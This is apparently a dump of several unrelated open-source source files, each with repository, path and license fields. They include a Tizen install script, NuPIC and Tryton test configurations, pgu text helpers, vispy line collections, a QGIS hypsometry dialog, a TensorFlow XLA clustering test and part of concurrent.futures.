    D-Bus environment for that user, then install or uninstall the
    test package as requested (-i / -u)."""
    try:
        usage = "usage: inst.py -i"
        opts_parser = OptionParser(usage=usage)
        opts_parser.add_option(
            "-m", dest="mode", action="store", help="Specify mode")
        opts_parser.add_option(
            "-s", dest="device", action="store", help="Specify device")
        opts_parser.add_option(
            "-i", dest="binstpkg", action="store_true", help="Install package")
        opts_parser.add_option(
            "-u", dest="buninstpkg", action="store_true", help="Uninstall package")
        opts_parser.add_option(
            "-a", dest="user", action="store", help="User name")
        global PARAMETERS
        (PARAMETERS, args) = opts_parser.parse_args()
    except Exception as e:
        print "Got wrong option: %s, exit ..." % e
        sys.exit(1)

    if not PARAMETERS.user:
        PARAMETERS.user = "app"
    global SRC_DIR, PKG_SRC_DIR
    SRC_DIR = "/home/%s/content" % PARAMETERS.user
    PKG_SRC_DIR = "%s/tct/opt/%s" % (SRC_DIR, PKG_NAME)
    if not PARAMETERS.mode:
        PARAMETERS.mode = "SDB"

    if PARAMETERS.mode == "SDB":
        # no device given: pick the first one 'sdb devices' reports
        if not PARAMETERS.device:
            (return_code, output) = doCMD("sdb devices")
            for line in output:
                if str.find(line, "\tdevice") != -1:
                    PARAMETERS.device = line.split("\t")[0]
                    break
    else:
        PARAMETERS.mode = "SSH"

    if not PARAMETERS.device:
        print "No device provided"
        sys.exit(1)

    # the user's uid is needed to locate their session D-Bus socket
    user_info = getUSERID()
    re_code = user_info[0]
    if re_code == 0:
        global XW_ENV
        userid = user_info[1][0]
        XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/%s/dbus/user_bus_socket" % str(
            userid)
    else:
        print "[Error] cmd commands error : %s" % str(user_info[1])
        sys.exit(1)
    if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
        print "-i and -u are conflict"
        sys.exit(1)

    if PARAMETERS.buninstpkg:
        if not uninstPKGs():
            sys.exit(1)
    else:
        if not instPKGs():
            sys.exit(1)
# Script entry point: run the install/uninstall flow; main() exits
# non-zero itself on failure, so reaching sys.exit(0) means success.
if __name__ == "__main__":
    main()
    sys.exit(0)
| bsd-3-clause |
blueburningcoder/nupic | examples/opf/experiments/multistep/hotgym_best_sp_5step_16K/description.py | 6 | 3267 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
## This file defines parameters for a prediction experiment.
import os
from nupic.frameworks.opf.expdescriptionhelpers import importBaseDescription
# the sub-experiment configuration
# Overrides applied on top of the base hotgym description: a
# NontemporalMultiStep model with an adaptive scalar encoder for
# 'consumption' (n=28) plus day-of-week and time-of-day date encoders,
# run over 16000 records.
config = \
{ 'modelParams': { 'clParams': { 'verbosity': 0},
                   'inferenceType': 'NontemporalMultiStep',
                   'sensorParams': { 'encoders': { 'consumption': { 'clipInput': True,
                                                                    'fieldname': u'consumption',
                                                                    'n': 28,
                                                                    'name': u'consumption',
                                                                    'type': 'AdaptiveScalarEncoder',
                                                                    'w': 21},
                                                   'timestamp_dayOfWeek': { 'dayOfWeek': ( 21,
                                                                                           3),
                                                                            'fieldname': u'timestamp',
                                                                            'name': u'timestamp_dayOfWeek',
                                                                            'type': 'DateEncoder'},
                                                   'timestamp_timeOfDay': { 'fieldname': u'timestamp',
                                                                            'name': u'timestamp_timeOfDay',
                                                                            'timeOfDay': ( 21,
                                                                                           1),
                                                                            'type': 'DateEncoder'},
                                                   'timestamp_weekend': None},
                                     'verbosity': 0},
                   'spParams': { },
                   'tpParams': { 'activationThreshold': 13,
                                 'minThreshold': 9,
                                 'verbosity': 0}},
  'numRecords': 16000}

# Merge the overrides into the base experiment description and re-export
# every name it defines so this module behaves like a full description.py.
mod = importBaseDescription('../hotgym/description.py', config)
locals().update(mod.__dict__)
| agpl-3.0 |
mediafactory/tryton_core_daemon | trytond/test/import_data.py | 1 | 4413 | #This file is part of Tryton. The COPYRIGHT file at the top level of
#this repository contains the full copyright notices and license terms.
"Test for import_data"
from trytond.model import ModelSQL, fields
# Each model below exposes a single column of one basic Tryton field
# type so the import_data test suite can exercise CSV import for every
# type.  Instantiating the class at import time registers it in the
# model pool (old-style Tryton registration).

class ImportDataBoolean(ModelSQL):
    "Import Data Boolean"
    _name = 'test.import_data.boolean'
    _description = __doc__
    boolean = fields.Boolean('Boolean')

ImportDataBoolean()


class ImportDataInteger(ModelSQL):
    "Import Data Integer"
    _name = 'test.import_data.integer'
    _description = __doc__
    integer = fields.Integer('Integer')

ImportDataInteger()


class ImportDataFloat(ModelSQL):
    "Import Data Float"
    _name = 'test.import_data.float'
    _description = __doc__
    float = fields.Float('Float')

ImportDataFloat()


class ImportDataNumeric(ModelSQL):
    "Import Data Numeric"
    _name = 'test.import_data.numeric'
    _description = __doc__
    numeric = fields.Numeric('Numeric')

ImportDataNumeric()


class ImportDataChar(ModelSQL):
    "Import Data Char"
    _name = 'test.import_data.char'
    _description = __doc__
    char = fields.Char('Char')

ImportDataChar()


class ImportDataText(ModelSQL):
    "Import Data Text"
    _name = 'test.import_data.text'
    _description = __doc__
    text = fields.Text('Text')

ImportDataText()


class ImportDataSha(ModelSQL):
    "Import Data Sha"
    _name = 'test.import_data.sha'
    _description = __doc__
    sha = fields.Sha('Sha')

ImportDataSha()


class ImportDataDate(ModelSQL):
    "Import Data Date"
    _name = 'test.import_data.date'
    _description = __doc__
    date = fields.Date('Date')

ImportDataDate()


class ImportDataDateTime(ModelSQL):
    "Import Data DateTime"
    _name = 'test.import_data.datetime'
    _description = __doc__
    datetime = fields.DateTime('DateTime')

ImportDataDateTime()


class ImportDataSelection(ModelSQL):
    "Import Data Selection"
    _name = 'test.import_data.selection'
    _description = __doc__
    selection = fields.Selection([
            ('select1', 'Select 1'),
            ('select2', 'Select 2'),
            ], 'Selection')

ImportDataSelection()
# Relation fixtures: a Many2One with its target model, and a Many2Many
# with its target and the explicit relation table model.

class ImportDataMany2OneTarget(ModelSQL):
    "Import Data Many2One Target"
    _name = 'test.import_data.many2one.target'
    _description = __doc__
    name = fields.Char('Name')

ImportDataMany2OneTarget()


class ImportDataMany2One(ModelSQL):
    "Import Data Many2One"
    _name = 'test.import_data.many2one'
    _description = __doc__
    many2one = fields.Many2One('test.import_data.many2one.target',
            'Many2One')

ImportDataMany2One()


class ImportDataMany2ManyTarget(ModelSQL):
    "Import Data Many2Many Target"
    _name = 'test.import_data.many2many.target'
    _description = __doc__
    name = fields.Char('Name')

ImportDataMany2ManyTarget()


class ImportDataMany2Many(ModelSQL):
    "Import Data Many2Many"
    _name = 'test.import_data.many2many'
    _description = __doc__
    many2many = fields.Many2Many('test.import_data.many2many.relation',
            'many2many', 'target', 'Many2Many')

ImportDataMany2Many()


class ImportDataMany2ManyRelation(ModelSQL):
    "Import Data Many2Many Relation"
    # NOTE(review): unlike its siblings this model sets no _description.
    _name = 'test.import_data.many2many.relation'
    many2many = fields.Many2One('test.import_data.many2many', 'Many2One')
    target = fields.Many2One('test.import_data.many2many.target', 'Target')

ImportDataMany2ManyRelation()
# One2Many pair (parent and child holding the back-reference) and a
# Reference field with its selectable target model.

class ImportDataOne2Many(ModelSQL):
    "Import Data One2Many"
    _name = 'test.import_data.one2many'
    _description = __doc__
    name = fields.Char('Name')
    one2many = fields.One2Many('test.import_data.one2many.target', 'one2many',
            'One2Many')

ImportDataOne2Many()


class ImportDataOne2ManyTarget(ModelSQL):
    "Import Data One2Many Target"
    _name = 'test.import_data.one2many.target'
    _description = __doc__
    name = fields.Char('Name')
    one2many = fields.Many2One('test.import_data.one2many', 'One2Many')

ImportDataOne2ManyTarget()


class ImportDataReferenceSelection(ModelSQL):
    "Import Data Reference Selection"
    _name = 'test.import_data.reference.selection'
    _description = __doc__
    name = fields.Char('Name')

ImportDataReferenceSelection()


class ImportDataReference(ModelSQL):
    "Import Data Reference"
    # NOTE(review): no _description here, unlike the other models.
    _name = 'test.import_data.reference'
    reference = fields.Reference('Reference', [
            ('test.import_data.reference.selection', 'Test'),
            ])

ImportDataReference()
| gpl-3.0 |
ajhalme/kbsim | lib/pgu/text.py | 30 | 2411 | """A collection of text rendering functions"""
def write(s,font,pos,color,text,border=1):
    """Render *text* onto surface *s* at *pos*, outlined in black.

    The outline is faked by blitting a black copy of the text at the
    eight offsets surrounding *pos* (scaled by *border*) before the
    colored text is drawn on top.
    """
    shadow = font.render(text, 1, (0, 0, 0))
    for dx in (-1, 0, 1):
        for dy in (-1, 0, 1):
            if dx or dy:
                s.blit(shadow, (pos[0] + dx * border, pos[1] + dy * border))
    img = font.render(text, 1, color)
    s.blit(img, pos)
def writec(s,font,color,text,border=1):
    """Write black-bordered text centered on the surface *s*."""
    # Center the rendered size within the destination surface.
    w, h = font.size(text)
    centered = ((s.get_width() - w) / 2, (s.get_height() - h) / 2)
    write(s, font, centered, color, text, border)
def writepre(s,font,rect,color,text):
    """Blit *text* onto *s* line by line, preserving explicit breaks.

    Every line starts at rect.left; the vertical step is the height of
    a rendered space character.
    """
    txt = text.replace("\t"," ")
    line_h = font.render(" ", 1, color).get_size()[1]
    y = rect.top
    for line in txt.split("\n"):
        s.blit(font.render(line, 1, color), (rect.left, y))
        y += line_h
def writewrap(s, font, rect, color, text, maxlines=None, wrapchar=False):
    """Write wrapped text on a pygame surface.

    maxlines -- specifies the maximum number of lines to write
        before stopping
    wrapchar -- whether to wrap at the character level, or
        word level
    """
    r,c,txt = rect,color,text
    txt = txt.replace("\t", " "*8)
    # height of one line, taken from a rendered space character
    tmp = font.render(" ", 1, c)
    sw,sh = tmp.get_size()
    y = r.top
    row = 1
    done = False
    for sentence in txt.split("\n"):
        x = r.left
        if wrapchar:
            # iterating a string yields its characters
            words = sentence
        else:
            words = sentence.split(" ")
        for word in words:
            if (not wrapchar):
                # restore the separator eaten by split so spacing is kept
                word += " "
            tmp = font.render(word, 1, c)
            (iw, ih) = tmp.get_size()
            # wrap before blitting a fragment that would overflow the
            # right edge of the rect
            if (x+iw > r.right):
                x = r.left
                y += sh
                row += 1
                if (maxlines != None and row > maxlines):
                    done = True
                    break
            s.blit(tmp, (x, y))
            #x += iw+sw
            x += iw
        if done:
            break
        y += sh
        row += 1
        if (maxlines != None and row > maxlines):
            break
| gpl-3.0 |
kkuunnddaannkk/vispy | vispy/visuals/collections/raw_segment_collection.py | 14 | 3516 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2014, Nicolas P. Rougier
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
"""
Raw Segment Collection
This collection provides fast raw (& ugly) line segments.
"""
import numpy as np
from vispy import glsl
from . collection import Collection
from ..transforms import NullTransform
class RawSegmentCollection(Collection):

    """
    Raw Segment Collection

    This collection provides fast raw (& ugly) line segments.
    """

    def __init__(self, user_dtype=None, transform=None,
                 vertex=None, fragment=None, **kwargs):
        """
        Initialize the collection.

        Parameters
        ----------

        user_dtype: list
            The base dtype can be completed (appended) by the used_dtype. It
            only make sense if user also provide vertex and/or fragment shaders

        transform : string
            GLSL Transform code defining the vec4 transform(vec3) function

        vertex: string
            Vertex shader code

        fragment: string
            Fragment shader code

        color : string
            'local', 'shared' or 'global'
        """
        base_dtype = [("position", (np.float32, 3), "!local", (0, 0, 0)),
                      ("color", (np.float32, 4), "global", (0, 0, 0, 1)),
                      ("viewport", (np.float32, 4), "global", (0, 0, 512, 512))
                      ]

        dtype = base_dtype
        if user_dtype:
            dtype.extend(user_dtype)

        if vertex is None:
            vertex = glsl.get('collections/raw-segment.vert')
        if transform is None:
            transform = NullTransform()
        self.transform = transform
        if fragment is None:
            fragment = glsl.get('collections/raw-segment.frag')

        Collection.__init__(self, dtype=dtype, itype=None, mode='lines',
                            vertex=vertex, fragment=fragment, **kwargs)
        self._programs[0].vert['transform'] = self.transform

    def append(self, P0, P1, itemsize=None, **kwargs):
        """
        Append a new set of segments to the collection.

        For kwargs argument, n is the number of vertices (local) or the number
        of item (shared)

        Parameters
        ----------

        P0 : np.array
            Start points of the segment(s) to be added

        P1 : np.array
            End points of the segment(s) to be added

        itemsize: int or None
            Size of an individual segment item

        color : list, array or 4-tuple
            Segment color
        """
        itemsize = itemsize or 1
        # Floor division keeps the count an int: on Python 3 the plain
        # '/' used previously produced a float, which np.empty rejects
        # as a shape.
        itemcount = len(P0) // itemsize

        V = np.empty(itemcount, dtype=self.vtype)

        # Apply default values on vertices
        for name in self.vtype.names:
            if name not in ['collection_index', 'P']:
                V[name] = kwargs.get(name, self._defaults[name])
        # Each segment contributes two vertices: even slots get the
        # start points, odd slots the end points.
        V = np.repeat(V, 2, axis=0)
        V['P'][0::2] = P0
        V['P'][1::2] = P1

        # Uniforms
        if self.utype:
            U = np.zeros(itemcount, dtype=self.utype)
            for name in self.utype.names:
                if name not in ["__unused__"]:
                    U[name] = kwargs.get(name, self._defaults[name])
        else:
            U = None

        Collection.append(self, vertices=V, uniforms=U, itemsize=itemsize)
| bsd-3-clause |
mlt/siam | hypsometrydialog.py | 1 | 10123 | # -*- coding: utf-8 -*-
# /***************************************************************************
# HypsometryDialog
# A QGIS plugin
# For now only hypsometry around inlets
# -------------------
# begin : 2013-11-05
# copyright : (C) 2013 by Mikhail Titov
# email : mlt@gmx.us
# ***************************************************************************/
#
# /***************************************************************************
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU General Public License as published by *
# * the Free Software Foundation; either version 2 of the License, or *
# * (at your option) any later version. *
# * *
# ***************************************************************************/
from PyQt4 import QtCore, QtGui, uic
from PyQt4.QtCore import QCoreApplication
from qgis.core import *
import logging, logging.config
from os.path import dirname, join
from persistent import PersistentDialog
from hypsometry import Starter
import multiprocessing as mp
import os, sys
import logging
import time
try:
from osgeo import gdal, osr, ogr
from osgeo.gdalconst import *
except ImportError:
import gdal, osr, ogr
from gdalconst import *
class HypsometryDialog(PersistentDialog):
    def __init__(self):
        """Build the dialog from ui_hypsometry.ui and wire up the
        buttons, the status bar and the elapsed-time timer."""
        PersistentDialog.__init__(self)
        uic.loadUi(join(dirname(__file__), 'ui_hypsometry.ui'), self)
        # The standard button-box signals are disconnected: Run/Abort/
        # Close are driven manually instead of via accept()/reject().
        self.buttonBox.accepted.disconnect()
        self.buttonBox.rejected.disconnect()
        self.buttonRun = self.buttonBox.button(QtGui.QDialogButtonBox.Ok)
        self.buttonAbort = self.buttonBox.button(QtGui.QDialogButtonBox.Abort)
        self.buttonClose = self.buttonBox.button(QtGui.QDialogButtonBox.Close)
        self._log = logging.getLogger('siam.hypsometry')
        # self.handler = LogHandler()
        # self.handler.setLevel(logging.INFO)
        # formatter = logging.Formatter('%(processName)s: %(message)s')
        # self.handler.setFormatter(formatter)
        self._load_settings()
        # Coarse 2 s timer used only to refresh the elapsed-time label.
        self.timer = QtCore.QTimer(self)
        self.timer.setInterval(2000)
        # self.timer.setTimerType(QtCore.VeryCoarseTimer) # QT5
        self.timer.timeout.connect(self.on_timer_timeout)
        self.statusBar = QtGui.QStatusBar(self)
        # self.statusBar.setWidth(self.width())
        self.labelTime = QtGui.QLabel(self)
        # self.labelTime.setFrameShape(QtGui.QFrame.NoFrame)
        self.labelTime.setText('Ready')
        self.statusBar.addWidget(self.labelTime)
        self.verticalLayout.addWidget(self.statusBar)
        # wall-clock start of the current run (set elsewhere before the
        # timer is started; see on_timer_timeout)
        self.tic = 0
        self.buttonAbort.setEnabled(False)
# def event(self, e):
# if e.type() == QtCore.QEvent.StatusTip:
# self.statusBar.showMessage(e.tip())
# return True
# return True
    # @QtCore.pyqtSlot()
    def on_timer_timeout(self):
        # Refresh the elapsed-time label; fired every 2 s by self.timer
        # while a run is in progress (self.tic holds the start time).
        self.labelTime.setText('Elapsed: {:d}s'.format(int(time.time()-self.tic)))
@QtCore.pyqtSlot(str)
def on_cbConnection_currentIndexChanged(self, name):
settings = QtCore.QSettings()
settings.beginGroup('PostgreSQL')
settings.beginGroup('connections')
settings.beginGroup(name)
self.host = settings.value('host')
self.port = settings.value('port')
self.dbname = settings.value('database')
self.user = settings.value('username')
fname = "PG:dbname='{database:s}' host={host:s} port={port:s} user='{user:s}'".format(
database = self.dbname,
host = self.host,
port = self.port,
user = self.user
)
settings.endGroup()
settings.endGroup()
settings.endGroup()
self.cbInlets.clear()
ds = ogr.Open(fname)
if ds is None:
QtGui.QMessageBox.critical(self, 'Connection failed', 'Failed to connect to a data source "{:s}"'.format(fname))
return
for i in range(ds.GetLayerCount()):
layer = ds.GetLayer(i)
if ogr.wkbPoint == layer.GetGeomType():
self.cbInlets.addItem(layer.GetName())
self.cbDEM.clear()
layer = ds.ExecuteSQL('select r_table_name from raster_columns order by r_table_name')
for f in layer:
self.cbDEM.addItem(f.GetField(0))
self.cbMap.clear()
self.cbOutput.clear()
self.cbPartitions.clear()
layer = ds.ExecuteSQL("""
SELECT table_schema || '.' || table_name as table
FROM information_schema.tables
--WHERE table_type = 'BASE TABLE'
WHERE table_schema NOT IN ('information_schema', 'pg_catalog')
ORDER BY table_schema,table_name;""")
for f in layer:
name = f.GetField(0)
self.cbMap.addItem(name)
self.cbOutput.addItem(name)
self.cbPartitions.addItem(name)
self.cbMap.setCurrentIndex(-1)
self.cbMap.setEditText('side_inlets_parts')
self.cbOutput.setCurrentIndex(-1)
self.cbOutput.setEditText('hypsometry')
self.cbPartitions.setCurrentIndex(-1)
self.cbPartitions.setEditText('dem_parts')
def _load_settings(self):
settings = QtCore.QSettings()
selected = settings.value('PostgreSQL/connections/selected') or settings.value('siam/hypsometry')
settings.beginGroup('PostgreSQL')
settings.beginGroup('connections')
self.cbConnection.addItems( settings.childGroups() )
settings.endGroup()
settings.endGroup()
if selected:
self.cbConnection.setCurrentIndex( self.cbConnection.findText(selected) )
settings.beginGroup('siam')
settings.beginGroup('hypsometry')
self.loadall(settings)
settings.endGroup()
settings.endGroup()
def _save_settings(self):
settings = QtCore.QSettings()
settings.beginGroup('siam')
settings.beginGroup('hypsometry')
self.saveall(settings)
settings.endGroup()
settings.endGroup()
# @QtCore.pyqtSlot()
def on_buttonAbort_clicked(self):
if QtGui.QMessageBox.Yes == QtGui.QMessageBox.question(
self,
QCoreApplication.translate('hypsometry', 'Are you sure?'),
QCoreApplication.translate('hypsometry', 'abort?'),
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No):
self.on_finished()
self.extractor.kill()
# self.buttonAbort.setEnabled(False)
# self.tic = 0
# self.buttonRun.setEnabled(True)
# @QtCore.pyqtSlot()
def on_buttonClose_clicked(self):
if self.tic == 0 or QtGui.QMessageBox.Yes == QtGui.QMessageBox.question(
self,
QCoreApplication.translate('hypsometry', 'Are you sure?'),
QCoreApplication.translate('hypsometry', 'close?'),
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No):
self.reject()
# @QtCore.pyqtSlot(QtGui.QAbstractButton)
def on_buttonBox_clicked(self, button):
sb = self.buttonBox.standardButton(button)
dispatcher = {
QtGui.QDialogButtonBox.Ok: self.on_buttonRun_clicked,
QtGui.QDialogButtonBox.Close: self.on_buttonClose_clicked,
QtGui.QDialogButtonBox.Abort: self.on_buttonAbort_clicked
}
if dispatcher.has_key(sb):
dispatcher[sb]()
# def reject(self):
# QtGui.QMessageBox.question(self, 'hello', 'reject()')
# def accept(self):
# # super(HypsometryDialog, self).accept()
@QtCore.pyqtSlot()
def on_buttonRun_clicked(self):
self._save_settings()
self.thread = QtCore.QThread(self) # self
args = dict(
host=self.host,
port=self.port,
dbname=self.dbname,
user=self.user,
dem_table=str(self.cbDEM.currentText()),
dem_parts=str(self.cbPartitions.currentText()),
parts_map=str(self.cbMap.currentText()),
layer=str(self.cbInlets.currentText()),
out="PG:host={host:s} port={port:s} dbname='{dbname:s}' user='{user:s}'".format(
host=self.host, port=self.port, dbname=self.dbname, user=self.user),
table=str(self.cbOutput.currentText()),
max_height=self.sbMaxStage.value(),
max_area=self.sbMaxArea.value(),
step=self.sbStep.value(),
radius=self.sbRadius.value(),
fixup=False,
where=None,
threads=mp.cpu_count(),
mp=True,
find_bottom=self.checkBoxFindBottom.checkState(),
_loglevel=self._log.getEffectiveLevel()
)
self.extractor = Worker(args)
self.thread.started.connect(self.extractor.start)
self.thread.finished.connect(self.on_finished)
# self.extractor.finished.connect(self.thread.quit)
QtCore.QObject.connect(self.extractor, QtCore.SIGNAL("finished()"),
self.thread.quit)
self.extractor.moveToThread(self.thread)
self.buttonRun.setEnabled(False)
self.buttonAbort.setEnabled(True)
self.thread.start()
self.tic = time.time()
self.timer.start()
def on_finished(self):
self.timer.stop()
# self._log.removeHandler(self.handler)
self.tic = 0
self.buttonRun.setEnabled(True)
self.buttonAbort.setEnabled(False)
class Worker(QtCore.QObject, Starter):
    """ Worker object to fetch hypsometry polygons in separate thread """
    # Emitted when run() completes so the owning QThread can quit
    # (connected to thread.quit by HypsometryDialog.on_buttonRun_clicked).
    finished = QtCore.pyqtSignal()
    def __init__(self, args):
        # Initialise QObject through the MRO first, then Starter explicitly
        # with the run arguments (Starter is not cooperative-super aware).
        super(Worker, self).__init__()
        Starter.__init__(self, args)
    @QtCore.pyqtSlot()
    def start(self):
        # Invoked via QThread.started after moveToThread(), so run()
        # executes in the worker thread, not the GUI thread.
        self.run()
        self.finished.emit()
| gpl-3.0 |
nightjean/Deep-Learning | tensorflow/compiler/tests/clustering_test.py | 123 | 3878 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the behavior of the auto-compilation pass."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import googletest
# Fully-qualified device string used to force op placement on the host CPU.
CPU_DEVICE = "/job:localhost/replica:0/task:0/cpu:0"
class ClusteringTest(XLATestCase):
  """Checks that XLA auto-clustering produces correct results when ops are
  split between the CPU device and the XLA test device."""
  def testAdd(self):
    """Elementwise add of two constants entirely inside the XLA scope."""
    val1 = np.array([4, 3, 2, 1], dtype=np.float32)
    val2 = np.array([5, 6, 7, 8], dtype=np.float32)
    expected = val1 + val2
    with self.test_session():
      with self.test_scope():
        input1 = constant_op.constant(val1, name="const1")
        input2 = constant_op.constant(val2, name="const2")
        output = math_ops.add(input1, input2)
      result = output.eval()
    self.assertAllClose(result, expected, rtol=1e-3)
  def testAddFromCpuMultiple(self):
    """Inputs on the CPU, add on the XLA device, evaluated repeatedly."""
    val1 = np.array([4, 3, 2, 1]).astype(np.float32)
    val2 = np.array([5, 6, 7, 8]).astype(np.float32)
    expected = val1 + val2
    with self.test_session():
      with ops.device(CPU_DEVICE):
        input1 = constant_op.constant(val1, name="const1")
        input2 = constant_op.constant(val2, name="const2")
      with self.test_scope():
        output = math_ops.add(input1, input2)
      # Repeated eval exercises cached executable reuse across runs.
      for _ in xrange(10):
        result = output.eval()
        self.assertAllClose(result, expected, rtol=1e-3)
  def testDeadlock(self):
    # Builds a graph of the form:
    # x -> y
    # | \
    # z -> w
    # where x and z are placed on the CPU and y and w are placed on the XLA
    # device. If y and w are clustered for compilation, then the graph will
    # deadlock since the clustered graph will contain a self-loop.
    with self.test_session() as sess:
      with ops.device(CPU_DEVICE):
        x = array_ops.placeholder(dtypes.float32, [2])
      with self.test_scope():
        y = x * 2
      with ops.device(CPU_DEVICE):
        z = y * y
      with self.test_scope():
        w = y + z
      result = sess.run(w, {x: [1.5, 0.5]})
    self.assertAllClose(result, [12., 2.], rtol=1e-3)
  def testHostMemory(self):
    """A cluster output used as a compile-time constant by a later cluster."""
    with self.test_session() as sess:
      x = array_ops.placeholder(dtypes.int32)
      with self.test_scope():
        y = x + 1
      with ops.device(CPU_DEVICE):
        # Place a computation on the CPU, so y and w cannot be merged into the
        # same JIT compilation.
        z = y * 2
      with self.test_scope():
        # Argument 'y' is a non-constant output of a previous cluster. Make sure
        # it is properly copied to host memory so it can be used as a
        # compile-time constant input for this cluster.
        w = array_ops.reshape(z, y)
      result = sess.run(w, {x: [1, 0]})
      expected = np.array([[4], [2]], dtype=np.int32)
      self.assertAllClose(expected, result, rtol=1e-3)
if __name__ == "__main__":
googletest.main()
| apache-2.0 |
akhil22/YouCompleteMe | third_party/pythonfutures/concurrent/futures/_base.py | 89 | 19642 | # Copyright 2009 Brian Quinlan. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
from __future__ import with_statement
import logging
import threading
import time
try:
from collections import namedtuple
except ImportError:
from concurrent.futures._compat import namedtuple
__author__ = 'Brian Quinlan (brian@sweetapp.com)'
# Conditions accepted by wait()'s and as_completed()'s return_when argument.
FIRST_COMPLETED = 'FIRST_COMPLETED'
FIRST_EXCEPTION = 'FIRST_EXCEPTION'
ALL_COMPLETED = 'ALL_COMPLETED'
# Internal-only condition used by as_completed().
_AS_COMPLETED = '_AS_COMPLETED'
# Possible future states (for internal use by the futures package).
PENDING = 'PENDING'
RUNNING = 'RUNNING'
# The future was cancelled by the user...
CANCELLED = 'CANCELLED'
# ...and _Waiter.add_cancelled() was called by a worker.
CANCELLED_AND_NOTIFIED = 'CANCELLED_AND_NOTIFIED'
FINISHED = 'FINISHED'
_FUTURE_STATES = [
    PENDING,
    RUNNING,
    CANCELLED,
    CANCELLED_AND_NOTIFIED,
    FINISHED
]
# Human-readable state names used by Future.__repr__.
_STATE_TO_DESCRIPTION_MAP = {
    PENDING: "pending",
    RUNNING: "running",
    CANCELLED: "cancelled",
    CANCELLED_AND_NOTIFIED: "cancelled",
    FINISHED: "finished"
}
# Logger for internal use by the futures package.
LOGGER = logging.getLogger("concurrent.futures")
class Error(Exception):
    """Base class for all future-related exceptions.

    Catching this type handles both CancelledError and TimeoutError.
    """
    pass
class CancelledError(Error):
    """The Future was cancelled.

    Raised by Future.result() and Future.exception() when the future was
    cancelled before it produced a result.
    """
    pass
class TimeoutError(Error):
    """The operation exceeded the given deadline.

    Raised by as_completed(), Future.result() and Future.exception() when
    the timeout elapses before completion.
    """
    pass
class _Waiter(object):
"""Provides the event that wait() and as_completed() block on."""
def __init__(self):
self.event = threading.Event()
self.finished_futures = []
def add_result(self, future):
self.finished_futures.append(future)
def add_exception(self, future):
self.finished_futures.append(future)
def add_cancelled(self, future):
self.finished_futures.append(future)
class _AsCompletedWaiter(_Waiter):
    """Used by as_completed()."""

    def __init__(self):
        super(_AsCompletedWaiter, self).__init__()
        # Guards finished_futures: workers append while as_completed()
        # drains the list between wake-ups.
        self.lock = threading.Lock()

    def _record_locked(self, record, future):
        # Append under the lock and signal while still holding it, matching
        # the drain protocol in as_completed().
        with self.lock:
            record(future)
            self.event.set()

    def add_result(self, future):
        self._record_locked(
            super(_AsCompletedWaiter, self).add_result, future)

    def add_exception(self, future):
        self._record_locked(
            super(_AsCompletedWaiter, self).add_exception, future)

    def add_cancelled(self, future):
        self._record_locked(
            super(_AsCompletedWaiter, self).add_cancelled, future)
class _FirstCompletedWaiter(_Waiter):
    """Used by wait(return_when=FIRST_COMPLETED)."""

    def _record_and_wake(self, record, future):
        # Any single completion satisfies FIRST_COMPLETED: record it and
        # release the waiter immediately.
        record(future)
        self.event.set()

    def add_result(self, future):
        self._record_and_wake(
            super(_FirstCompletedWaiter, self).add_result, future)

    def add_exception(self, future):
        self._record_and_wake(
            super(_FirstCompletedWaiter, self).add_exception, future)

    def add_cancelled(self, future):
        self._record_and_wake(
            super(_FirstCompletedWaiter, self).add_cancelled, future)
class _AllCompletedWaiter(_Waiter):
    """Used by wait(return_when=FIRST_EXCEPTION and ALL_COMPLETED)."""

    def __init__(self, num_pending_calls, stop_on_exception):
        self.num_pending_calls = num_pending_calls
        self.stop_on_exception = stop_on_exception
        # Guards the countdown so concurrent completions decrement safely.
        self.lock = threading.Lock()
        super(_AllCompletedWaiter, self).__init__()

    def _note_completion(self):
        # Count down one expected completion; wake the waiter when every
        # pending call has been accounted for.
        with self.lock:
            self.num_pending_calls -= 1
            if not self.num_pending_calls:
                self.event.set()

    def add_result(self, future):
        super(_AllCompletedWaiter, self).add_result(future)
        self._note_completion()

    def add_exception(self, future):
        super(_AllCompletedWaiter, self).add_exception(future)
        if not self.stop_on_exception:
            self._note_completion()
            return
        # FIRST_EXCEPTION: a single failure releases the waiter at once.
        self.event.set()

    def add_cancelled(self, future):
        super(_AllCompletedWaiter, self).add_cancelled(future)
        self._note_completion()
class _AcquireFutures(object):
"""A context manager that does an ordered acquire of Future conditions."""
def __init__(self, futures):
self.futures = sorted(futures, key=id)
def __enter__(self):
for future in self.futures:
future._condition.acquire()
def __exit__(self, *args):
for future in self.futures:
future._condition.release()
def _create_and_install_waiters(fs, return_when):
    """Build the _Waiter matching *return_when* and attach it to every future."""
